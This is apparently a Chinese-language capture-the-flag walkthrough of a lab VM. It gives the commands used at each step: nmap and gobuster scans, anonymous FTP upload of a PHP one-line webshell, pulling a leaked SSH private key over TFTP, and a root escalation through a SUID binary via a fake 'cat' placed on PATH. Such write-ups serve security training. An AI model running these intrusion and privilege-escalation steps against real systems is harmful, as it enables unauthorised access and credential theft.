文章目录
每日一学
NO.7 你了解哪些中间件
Apache
Nginx
IIS
Tomcat
JBoss
Weblogic
信息收集
先来扫网段
nmap -sP 192.168.2.0/24
继续收集端口,服务等信息
nmap -sC -sV -p- 192.168.2.23
开了FTP,SSH,HTTP,这里的FTP可以直接空密码登录,里面有一个空的index.html
打开网站一看,说id_rsa泄露了,这可得扫一波,并且名字叫alexia
gobuster dir -w directory-list-2.3-medium.txt -u http://192.168.2.23 -x txt,html,zip,php,rsa
扫完啥都没有
那就应该是在ftp服务器上面了,直接Anonymous 空密码登录一波
ftp 192.168.2.23
有一个.wbe目录
里面有一个index.html,下载下来看看
get index.html
我发现这个内容与我们看到的内容一致,那么这个目录就是网站的根目录了
那么我们可以直接上传一个一句话木马到这个目录
put 2.php
就当我以为要拿到webshell的时候,我发现不解析PHP,而是直接下载
扫目录扫不到,FTP上传PHP不解析,我也很异或~至此 FTP与Web端能够挖掘的东西都榨干了,可能是有一些端口没有扫到,扫一下UDP
先扫100个,因为速度实在是太慢
nmap -p1-100 -sU -sT 192.168.2.23
扫到tftp和dhcpc
漏洞利用
直接连接tftp
tftp 192.168.2.23
由于网页上的暗示,这里直接get id_rsa
接下来直接登录alexia用户
chmod 600 id_rsa
ssh alexia@192.168.2.23 -i id_rsa
登录成功
看一下sudo和suid
sudo -l
find / -user root -perm -4000 -print 2>/dev/null
发现/opt/showMetheKey
直接运行,拿到一个私钥,这个私钥似乎是我们自己的
/opt/showMetheKey
权限提升
把这个文件下载到本地反编译一下
python3 -m http.server
wget http://192.168.2.23:8000/showMetheKey
radare2 showMetheKey
aaa
afl
smain
pdf
我发现这个cat使用的是环境变量,而不是绝对路径,那么我们可以伪造一个cat
echo "/bin/sh" >cat
chmod +x cat
export PATH=/home/alexia/
/opt/showMetheKey
export PATH=/usr/bin/:$PATH
成功拿到root权限
/root目录下只有一个note.txt,他说他不记得放到哪里了
find / -name "root.txt"
找到root.txt
总结
总结:拿到webshell的过程还是小曲折的,当我看到index.html的时候都笑出声了,可是没想到居然不解析,局面一下陷入了僵局,过了半天,才想起来UDP扫一扫,这才发现tftp拿到私钥,拿到私钥之后就是简单的suid提权了,覆盖一下环境变量就好,总体还是偏易的